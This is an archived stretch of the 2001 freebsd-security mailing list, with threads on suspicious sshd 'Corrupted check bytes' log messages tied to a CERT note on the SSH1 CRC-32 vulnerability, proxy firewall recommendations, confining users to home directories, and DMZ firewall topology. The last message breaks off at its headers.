<3BFCF73E.000001.96546@frodo.searchcanada.ca> Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_2JD740MWKGMMYJ0CCJD0" To: freebsd-security@FreeBSD.ORG Subject: Odd sshd messages From: "Michael Richards" X-Fastmail-IP: 24.43.130.241 Date: Thu, 22 Nov 2001 08:01:50 -0500 (EST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --------------Boundary-00=_2JD740MWKGMMYJ0CCJD0 Content-Type: Text/Plain Content-Transfer-Encoding: 7bit I've been getting a number of odd sshd messages. I do not believe my sshd is vulnerable to any exploits. Here is what I see: Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check bytes on input. Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check bytes on input. Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check bytes on input. Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check bytes on input. Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check bytes on input. May just be a bogus client, but it may also be someone hammering at the back door. I'm running: sshd version OpenSSH_2.3.0 -Michael _________________________________________________________________ http://fastmail.ca/ - Fast Free Web Email for Canadians --------------Boundary-00=_2JD740MWKGMMYJ0CCJD0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 5:48:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailout06.sul.t-online.de (mailout06.sul.t-online.com [194.25.134.19]) by hub.freebsd.org (Postfix) with ESMTP id 2CD9B37B405 for ; Thu, 22 Nov 2001 05:48:10 -0800 (PST) Received: from fwd04.sul.t-online.de by mailout06.sul.t-online.de with smtp id 166uD3-00078i-00; Thu, 22 Nov 2001 14:48:09 +0100 Received: from asterix.local (320080844193-0001@[62.225.210.247]) by fmrl04.sul.t-online.com with smtp id 166uCj-0a6uCeC; Thu, 22 Nov 2001 14:47:49 +0100 Received: (qmail 442 invoked from network); 22 Nov 2001 13:47:48 -0000 Received: from homer.local (HELO homer.local.nlocal) (192.168.1.50) by 0 with SMTP; 22 Nov 2001 13:47:48 -0000 Received: (nullmailer pid 269 invoked by uid 1100); Thu, 22 Nov 2001 13:47:48 -0000 Date: Thu, 22 Nov 2001 14:47:48 +0100 From: Clemens Hermann To: FreeBSD security ML Subject: Juniper firewall Message-ID: <20011122144748.A241@homer.local> Mail-Followup-To: Clemens Hermann , FreeBSD security ML Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Mailer: Mutt 1.2.5i (FreeBSD 4.4-RELEASE i386) X-Sender: 320080844193-0001@t-dialin.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi On my search for a toolkit to build a proxy firewall I found the Juniper firewall. This one sounds interesting but seems to be dead. Majordomo does not respond and I couldn't find anything in the ports. Might anyone give a comment on Juniper if it can be used on a recent FreeBSD? tia /ch -- Wieviele Mitarbeiter von Microsoft benoetigt man fuer das auswechseln einer defekten Gluehbirne? Keine, Microsoft erklaert die Dunkelheit zum Marktstandart. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 6: 9:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from lorax.neutraldomain.org (dsl027-187-101.sfo1.dsl.speakeasy.net [216.27.187.101]) by hub.freebsd.org (Postfix) with ESMTP id 9051C37B417 for ; Thu, 22 Nov 2001 06:09:48 -0800 (PST) Received: by lorax.neutraldomain.org (Postfix, from userid 1001) id D189ECF8E; Thu, 22 Nov 2001 06:09:44 -0800 (PST) Date: Thu, 22 Nov 2001 06:09:44 -0800 From: Gabriel Rocha To: security@freebsd.org Subject: Re: Unknown transient service 1528/tcp Message-ID: <20011122060944.D8188@neutraldomain.org> References: <020801c1730b$8cd21fe0$41414fcb@lawn> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="bjuZg6miEcdLYP6q" Content-Disposition: inline In-Reply-To: <020801c1730b$8cd21fe0$41414fcb@lawn>; from lawngf@ihug.co.nz on Thu, Nov 22, 2001 at 05:08:34PM +1300 X-ideology: "VIVERE LIBERE AUT MORI" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --bjuZg6miEcdLYP6q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Nov 22, at 05:08PM, Geoff Lawn wrote: | Recently I noticed the following service appear... | 1528/tcp open mciautoreg Compile yourself a copy of lsof then run, as root, "lsof -iTCP:25" and enjoy. Good luck. --Gabe --=20 Churchill, Winston Leonard Spencer --On the eve of Britain's entry into World War II: "If you will not fight for right when you can easily win=20 without bloodshed; if you will not fight when your victory will be=20 sure and not too costly; you may come to the moment when you will=20 have to fight with all odds against you and only a precarious=20 chance of survival. There may be even a worse fate. You may have=20 to fight when there is no hope of victory, because it is better to=20 perish than to live as slaves. --bjuZg6miEcdLYP6q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7/QcognVKrFwQThMRAlldAJ4q/1Eb4xmnGcAREeFxb8hnIlsu5wCffIwS z+NQGrz75DgRuaBGlzl5T1Y= =JFd5 -----END PGP SIGNATURE----- --bjuZg6miEcdLYP6q-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 7:44:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2]) by hub.freebsd.org (Postfix) with ESMTP id BBC9437B405 for ; Thu, 22 Nov 2001 07:44:27 -0800 (PST) Received: by mail.interchange.ca (Fastmailer, from userid 555) id 636D61FBA; Thu, 22 Nov 2001 10:43:56 -0500 (EST) MIME-Version: 1.0 Message-Id: <3BFD1D3C.000003.54439@frodo.searchcanada.ca> Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_81L7ULUXFQQMYJ0CCJD0" To: fernan@iib.unsam.edu.ar Subject: Re: Odd sshd messages Cc: freebsd-security@FreeBSD.ORG From: "Michael Richards" X-Fastmail-IP: 24.43.130.241 Date: Thu, 22 Nov 2001 10:43:56 -0500 (EST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --------------Boundary-00=_81L7ULUXFQQMYJ0CCJD0 Content-Type: Text/Plain Content-Transfer-Encoding: 7bit If this is the case and I'm running a non-vulnerable 2.3.0 version then why do I get these messages? -Michael > This is documented at > http://www.cert.org/incident_notes/IN-2001-12.html > > Quoting it: > > Exploitation of vulnerability in SSH1 CRC-32 compensation attack > detector Original release Date: November 5, 2001 > Last revised: November 7, 2001 _________________________________________________________________ http://fastmail.ca/ - Fast Free Web Email for Canadians --------------Boundary-00=_81L7ULUXFQQMYJ0CCJD0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 7:57:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from yamato.ccrle.nec.de (yamato.ccrle.nec.de [195.37.70.1]) by hub.freebsd.org (Postfix) with ESMTP id 34ABD37B416 for ; Thu, 22 Nov 2001 07:57:52 -0800 (PST) Received: from citadel.mobility.ccrle.nec.de ([192.168.156.1]) by yamato.ccrle.nec.de (8.11.6/8.10.1) with ESMTP id fAMFvpk37945; Thu, 22 Nov 2001 16:57:51 +0100 (CET) Received: from [192.168.102.87] (agrajag.heidelberg.ccrle.nec.de [192.168.102.87]) by citadel.mobility.ccrle.nec.de (Postfix on SuSE eMail Server 2.0) with ESMTP id DD962C25D; Thu, 22 Nov 2001 16:57:54 +0100 (CET) Date: Thu, 22 Nov 2001 17:08:16 +0100 From: Enrico Giakas Reply-To: Enrico Giakas To: Clemens Hermann , FreeBSD security ML Subject: Re: Juniper firewall Message-ID: <598111959.1006448896@[192.168.102.87]> In-Reply-To: <20011122144748.A241@homer.local> References: <20011122144748.A241@homer.local> X-Mailer: Mulberry/2.1.0 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Try the NEC SOCKS5-Proxy Firewall (it is free) from the site: http://www.socks.nec.com/cgi-bin/download.pl bye > Hi > > On my search for a toolkit to build a proxy firewall I found the Juniper > firewall. This one sounds interesting but seems to be dead. Majordomo > does not respond and I couldn't find anything in the ports. > Might anyone give a comment on Juniper if it can be used on a recent > FreeBSD? > > tia > > /ch > > -- > Wieviele Mitarbeiter von Microsoft benoetigt man fuer das auswechseln > einer defekten Gluehbirne? Keine, Microsoft erklaert die Dunkelheit zum > Marktstandart. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > _____________________________________________________ Enrico Giakas Network Laboratories Heidelberg NEC Europe Ltd. Adenauerplatz 6 D-69115 Heidelberg, Germany Tel.:+49/(0) 62 21/905 11- 12 Fax :+49/(0) 62 21/905 11- 55 email: Enrico.Giakas@ccrle.nec.de _____________________________________________________ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 8:26:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailout05.sul.t-online.de (mailout05.sul.t-online.com [194.25.134.82]) by hub.freebsd.org (Postfix) with ESMTP id C623B37B417 for ; Thu, 22 Nov 2001 08:26:12 -0800 (PST) Received: from fwd04.sul.t-online.de by mailout05.sul.t-online.de with smtp id 166wg0-0003tJ-02; Thu, 22 Nov 2001 17:26:12 +0100 Received: from asterix.local (320080844193-0001@[217.80.84.32]) by fmrl04.sul.t-online.com with smtp id 166wfl-0iEOkiC; Thu, 22 Nov 2001 17:25:57 +0100 Received: (qmail 561 invoked from network); 22 Nov 2001 16:25:56 -0000 Received: from homer.local (HELO homer.local.nlocal) (192.168.1.50) by 0 with SMTP; 22 Nov 2001 16:25:56 -0000 Received: (nullmailer pid 270 invoked by uid 1100); Thu, 22 Nov 2001 16:25:55 -0000 Date: Thu, 22 Nov 2001 17:25:55 +0100 From: Clemens Hermann To: Enrico Giakas Cc: FreeBSD security ML Subject: Re: Juniper firewall Message-ID: <20011122172555.A241@homer.local> Mail-Followup-To: Clemens Hermann , Enrico Giakas , FreeBSD security ML References: <20011122144748.A241@homer.local> <598111959.1006448896@[192.168.102.87]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <598111959.1006448896@[192.168.102.87]> von Enrico Giakas am 22.Nov.2001 um 17:08:16 (+0100) X-Mailer: Mutt 1.2.5i (FreeBSD 4.4-RELEASE i386) X-Sender: 320080844193-0001@t-dialin.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am 22.11.2001 um 17:08:16 schrieb Enrico Giakas: Hi Enrico, > Try the NEC SOCKS5-Proxy Firewall (it is free) from the site: > http://www.socks.nec.com/cgi-bin/download.pl thanks for the hint. Isn't Socks like NAT with authentication (in the result)? Does Socks offer any kind of filtering on the application-layer? Am I wrong in my assumption that a "real" application proxy can offer more security e.g. by not allowing to misuse open ports for any app on non-standard ports? /ch -- Wieviele Mitarbeiter von Microsoft benoetigt man fuer das auswechseln einer defekten Gluehbirne? Keine, Microsoft erklaert die Dunkelheit zum Marktstandart. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 8:30:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from mafalda.univalle.edu.co (mafalda.univalle.edu.co [200.68.158.10]) by hub.freebsd.org (Postfix) with ESMTP id E479B37B427 for ; Thu, 22 Nov 2001 08:30:42 -0800 (PST) Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [192.168.18.91]) by mafalda.univalle.edu.co (8.11.3/8.11.3) with ESMTP id fAMGUbP16142 for ; Thu, 22 Nov 2001 11:30:37 -0500 (GMT) Received: from libertad.univalle.edu.co (jmcamayo@localhost.univalle.edu.co [127.0.0.1]) by libertad.univalle.edu.co (8.12.0/8.12.0) with ESMTP id fAMGfP2x011812 for ; Thu, 22 Nov 2001 11:41:25 -0500 (COT) Received: from localhost (jmcamayo@localhost) by libertad.univalle.edu.co (8.12.0/8.12.0/Submit) with ESMTP id fAMGfP9m011809 for ; Thu, 22 Nov 2001 11:41:25 -0500 (COT) Date: Thu, 22 Nov 2001 11:41:25 -0500 (COT) From: Juan Mauricio Camayo To: freebsd-security@FreeBSD.ORG Subject: Help on directories Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello. If someone know about a program that prevent the users to go back of his own directory, but allow to "see" his directories on it, just like the lids on Unix or linux, but not as restrictive as bash -r. English is not my native language, so i'm sorry if i did mistakes. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 8:41:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from yamato.ccrle.nec.de (yamato.ccrle.nec.de [195.37.70.1]) by hub.freebsd.org (Postfix) with ESMTP id 296D337B418 for ; Thu, 22 Nov 2001 08:41:27 -0800 (PST) Received: from citadel.mobility.ccrle.nec.de ([192.168.156.1]) by yamato.ccrle.nec.de (8.11.6/8.10.1) with ESMTP id fAMGfRk38824; Thu, 22 Nov 2001 17:41:27 +0100 (CET) Received: from [192.168.102.87] (agrajag.heidelberg.ccrle.nec.de [192.168.102.87]) by citadel.mobility.ccrle.nec.de (Postfix on SuSE eMail Server 2.0) with ESMTP id 2BE02C25D; Thu, 22 Nov 2001 17:41:31 +0100 (CET) Date: Thu, 22 Nov 2001 17:51:52 +0100 From: Enrico Giakas Reply-To: Enrico Giakas To: Clemens Hermann Cc: FreeBSD security ML Subject: Re: Juniper firewall Message-ID: <600728021.1006451512@[192.168.102.87]> In-Reply-To: <20011122172555.A241@homer.local> References: <20011122144748.A241@homer.local> <598111959.1006448896@[192.168.102.87]> <20011122172555.A241@homer.local> X-Mailer: Mulberry/2.1.0 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Please look to http://www.socks.nec.com/guidelines.html for further details Bye --On Donnerstag, 22. November 2001 17:25 +0100 Clemens Hermann wrote: > Am 22.11.2001 um 17:08:16 schrieb Enrico Giakas: > > Hi Enrico, > >> Try the NEC SOCKS5-Proxy Firewall (it is free) from the site: >> http://www.socks.nec.com/cgi-bin/download.pl > > thanks for the hint. Isn't Socks like NAT with authentication (in the > result)? Does Socks offer any kind of filtering on the application-layer? > Am I wrong in my assumption that a "real" application proxy can offer more > security e.g. by not allowing to misuse open ports for any app on > non-standard ports? > > /ch > > -- > Wieviele Mitarbeiter von Microsoft benoetigt man fuer das auswechseln > einer defekten Gluehbirne? Keine, Microsoft erklaert die Dunkelheit zum > Marktstandart. > _____________________________________________________ Enrico Giakas Network Laboratories Heidelberg NEC Europe Ltd. Adenauerplatz 6 D-69115 Heidelberg, Germany Tel.:+49/(0) 62 21/905 11- 12 Fax :+49/(0) 62 21/905 11- 55 email: Enrico.Giakas@ccrle.nec.de _____________________________________________________ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 9: 2:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from axel.truedestiny.net (b76168.upc-b.chello.nl [212.83.76.168]) by hub.freebsd.org (Postfix) with ESMTP id 0734737B417 for ; Thu, 22 Nov 2001 09:02:08 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by axel.truedestiny.net (Postfix) with ESMTP id C452949A25; Thu, 22 Nov 2001 18:02:06 +0100 (CET) Received: by axel.truedestiny.net (Postfix, from userid 1000) id 89ACD49A23; Thu, 22 Nov 2001 18:02:03 +0100 (CET) Date: Thu, 22 Nov 2001 18:02:03 +0100 From: Axel Scheepers To: Juan Mauricio Camayo Cc: freebsd-security@FreeBSD.ORG Subject: Re: Help on directories Message-ID: <20011122180203.C61433@mars.thuis> Reply-To: Axel Scheepers References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jmcamayo@libertad.univalle.edu.co on Thu, Nov 22, 2001 at 11:41:25AM -0500 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Nov 22, 2001 at 11:41:25AM -0500, Juan Mauricio Camayo wrote: > If someone know about a program that prevent the users to go back of his > own directory, but allow to "see" his directories on it, just like the > lids on Unix or linux, but not as restrictive as bash -r. I'm not quite sure what you mean, but you could try to chmod g-x for the dir, that way it is still visible but only the owner can cd into it. Hope this helps, -- Axel Scheepers UNIX System Administrator email: axel@axel.truedestiny.net ascheepers@vianetworks.nl http://axel.truedestiny.net/~axel ------------------------------------------ "You can't survive by sucking the juice from a wet mitten." -- Charles Schulz, "Things I've Had to Learn Over and Over and Over" ------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 9: 4:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from lila.inti.gov.ar (lila.inti.gov.ar [200.10.161.32]) by hub.freebsd.org (Postfix) with ESMTP id 8573D37B405 for ; Thu, 22 Nov 2001 09:04:40 -0800 (PST) Received: from nav.inti.gov.ar ([200.10.161.45]) by lila.inti.gov.ar with smtp (Exim 3.02 #1) id 166ve8-0005r7-00 for freebsd-security@FreeBSD.ORG; Thu, 22 Nov 2001 12:20:12 -0300 Received: from iib005.iib.unsam.edu.ar ([200.3.113.15]) by NAV.inti.gov.ar (NAVGW 2.5.1.12) with SMTP id M2001112212273410456 ; Thu, 22 Nov 2001 12:27:35 -0300 Received: (from fernan@localhost) by iib005.iib.unsam.edu.ar (8.11.3/8.11.3) id fAMFLmM11686; Thu, 22 Nov 2001 12:21:48 -0300 (ART) (envelope-from fernan) Date: Thu, 22 Nov 2001 12:21:47 -0300 From: Fernan Aguero To: Michael Richards Cc: freebsd-security@FreeBSD.ORG Subject: Re: Odd sshd messages Message-ID: <20011122122147.A11367@iib005.iib.unsam.edu.ar> References: <3BFCF73E.000001.96546@frodo.searchcanada.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3BFCF73E.000001.96546@frodo.searchcanada.ca>; from michael@fastmail.ca on Thu, Nov 22, 2001 at 08:01:50AM -0500 X-PGP-Key: http://genoma.unsam.edu.ar/~fernan/pubkey.asc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is documented at http://www.cert.org/incident_notes/IN-2001-12.html Quoting it: Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector Original release Date: November 5, 2001 Last revised: November 7, 2001 I. Overview The CERT/CC has received multiple reports of systems being compromised via the CRC-32 compensation attack detector vulnerability described in VU#945216. We are also receiving reports of increased scanning activity for the SSH service (22/tcp). II. Description In reports received by the CERT/CC, systems compromised via this vulnerablity have exhibited the following pattern in system log messages: hostname sshd[xxx]: Disconnecting: Corrupted check bytes on input. hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected ... The exploit for this vulnerability appears to use a brute force method, so many messages of this type may be logged before a system is successfully compromised. ... and goes on. Read the document for suggested solutions, basically - apply a patch - disable SSHv1 fallback support - restrict use of SSH service (until a patch can be applied) Fernan +----[ Michael Richards (michael@fastmail.ca) dijo sobre "Odd sshd messages": | | I've been getting a number of odd sshd messages. I do not believe my | sshd is vulnerable to any exploits. Here is what I see: | | Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check bytes | on input. | Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check bytes | on input. | Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check bytes | on input. | Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check bytes | on input. | Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check bytes | on input. | | May just be a bogus client, but it may also be someone hammering at | the back door. | | I'm running: | sshd version OpenSSH_2.3.0 | | -Michael | _________________________________________________________________ | http://fastmail.ca/ - Fast Free Web Email for Canadians | +----] -- | F e r n a n A g u e r o | B i o i n f o r m a t i c s | | fernan@iib.unsam.edu.ar | genoma.unsam.edu.ar | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 9:28: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id D280437B405 for ; Thu, 22 Nov 2001 09:27:58 -0800 (PST) Received: from DAVE ([192.168.0.54]) by chaos.evolve.za.net (8.11.6/1.1.3) with SMTP id fAMHRm602184 for ; Thu, 22 Nov 2001 19:27:53 +0200 (SAST) (envelope-from dave@raven.za.net) Message-ID: <001b01c1737a$9f1a7480$3600a8c0@DAVE> From: "Dave Raven" To: References: <20011122180203.C61433@mars.thuis> Subject: Re: Help on directories Date: Thu, 22 Nov 2001 19:24:57 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org As to whether or not this was the original question I am unsure, but on the subject I was wondering how do you achieve the same effect that adding a user to /etc/ftpchroot with a telnet / sshd shell. This would be so the user can access his directory etc (/home/bob) but not cd below it. Many shell servers etc use it. At least, I think that was the question. --Dave Optec Sec. ----- Original Message ----- From: "Axel Scheepers" To: "Juan Mauricio Camayo" Cc: Sent: Thursday, November 22, 2001 7:02 PM Subject: Re: Help on directories > On Thu, Nov 22, 2001 at 11:41:25AM -0500, Juan Mauricio Camayo wrote: > > If someone know about a program that prevent the users to go back of his > > own directory, but allow to "see" his directories on it, just like the > > lids on Unix or linux, but not as restrictive as bash -r. > > I'm not quite sure what you mean, but you could try to chmod g-x for the dir, > that way it is still visible but only the owner can cd into it. > Hope this helps, > -- > Axel Scheepers > UNIX System Administrator > > email: axel@axel.truedestiny.net > ascheepers@vianetworks.nl > http://axel.truedestiny.net/~axel > ------------------------------------------ > "You can't survive by sucking the juice from a wet mitten." > -- Charles Schulz, "Things I've Had to Learn Over and > Over and Over" > ------------------------------------------ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 9:54: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 974F037B405 for ; Thu, 22 Nov 2001 09:54:04 -0800 (PST) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.33 #1) id 166y3f-000Bto-00; Thu, 22 Nov 2001 19:54:43 +0200 From: Sheldon Hearn To: Fernan Aguero Cc: Michael Richards , freebsd-security@FreeBSD.ORG Subject: Re: Odd sshd messages In-reply-to: Your message of "Thu, 22 Nov 2001 12:21:47 -0300." <20011122122147.A11367@iib005.iib.unsam.edu.ar> Date: Thu, 22 Nov 2001 19:54:43 +0200 Message-ID: <45743.1006451683@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 22 Nov 2001 12:21:47 -0300, Fernan Aguero wrote: > This is documented at > http://www.cert.org/incident_notes/IN-2001-12.html Oddly enough, the source you quote says that this was addressed in OpenSSH-2.3.0, which is the version the original poster claimed to be using. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 10:21:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from pintail.mail.pas.earthlink.net (pintail.mail.pas.earthlink.net [207.217.120.122]) by hub.freebsd.org (Postfix) with ESMTP id 0BD9237B405 for ; Thu, 22 Nov 2001 10:21:42 -0800 (PST) Received: from user-33qtm2c.dialup.mindspring.com ([199.174.216.76] helo=gohan.cjclark.org) by pintail.mail.pas.earthlink.net with esmtp (Exim 3.33 #1) id 166yTk-0000N2-00; Thu, 22 Nov 2001 10:21:41 -0800 Received: (from cjc@localhost) by gohan.cjclark.org (8.11.6/8.11.1) id fAMBHdQ00890; Thu, 22 Nov 2001 03:17:39 -0800 (PST) (envelope-from cjc) Date: Thu, 22 Nov 2001 03:17:39 -0800 From: "Crist J. Clark" To: Fernando Germano Cc: security@FreeBSD.ORG Subject: Re: Best security topology for FreeBSD Message-ID: <20011122031739.A226@gohan.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <00ca01c172aa$814c90d0$ed64a8c0@audi2k> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00ca01c172aa$814c90d0$ed64a8c0@audi2k>; from fgermano@audiotel.com.ar on Wed, Nov 21, 2001 at 01:35:18PM -0300 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Nov 21, 2001 at 01:35:18PM -0300, Fernando Germano wrote: > > Could please help me? > > I'm about to install a FreeBSD 4.4 box with some firewall and I need to know > wich one of the freeware firewalls product is the best (IPFW, IPFilter, > etc), or maybe if you could recomend me a good solution for this situation: > > FreeBSD box = firewall with 10 NICs > > NIC 1 -> DMZ > NIC 2 -> Internet > NIC 3 -> Partner network > . > . > NIC 8 -> Partner network > NIC 9 -> Internal network > NIC 10 -> Internal network It is sad to see this poor design, Internet | | Firewall--"DMZ" | | Internal Used so very, very much these days (I think thanks to several firewall vendors pushing this as a standard design). A much better design, is Internet | | Firewall1 | | DMZ | | Firewall2 | | Internal (This design is actually where the term "DMZ" comes from since it actually looks like one here.) And in your case... that many NICs in one machine... I hope you have a dedicated stand-by. It's screaming "single point of failure." I would really consider NOT using one machine for all of this. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 11:56: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 4CE9037B419 for ; Thu, 22 Nov 2001 11:55:52 -0800 (PST) Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id D6B581DA7; Thu, 22 Nov 2001 20:55:31 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id 6369755A2; Thu, 22 Nov 2001 20:55:31 +0100 (CET) Date: Thu, 22 Nov 2001 20:55:30 +0100 (CET) From: Krzysztof Zaraska X-Sender: kzaraska@lhotse.zaraska.dhs.org To: cjclark@alum.mit.edu Cc: security@FreeBSD.ORG Subject: Firewall design [was: Re: Best security topology for FreeBSD] In-Reply-To: <20011122031739.A226@gohan.cjclark.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: 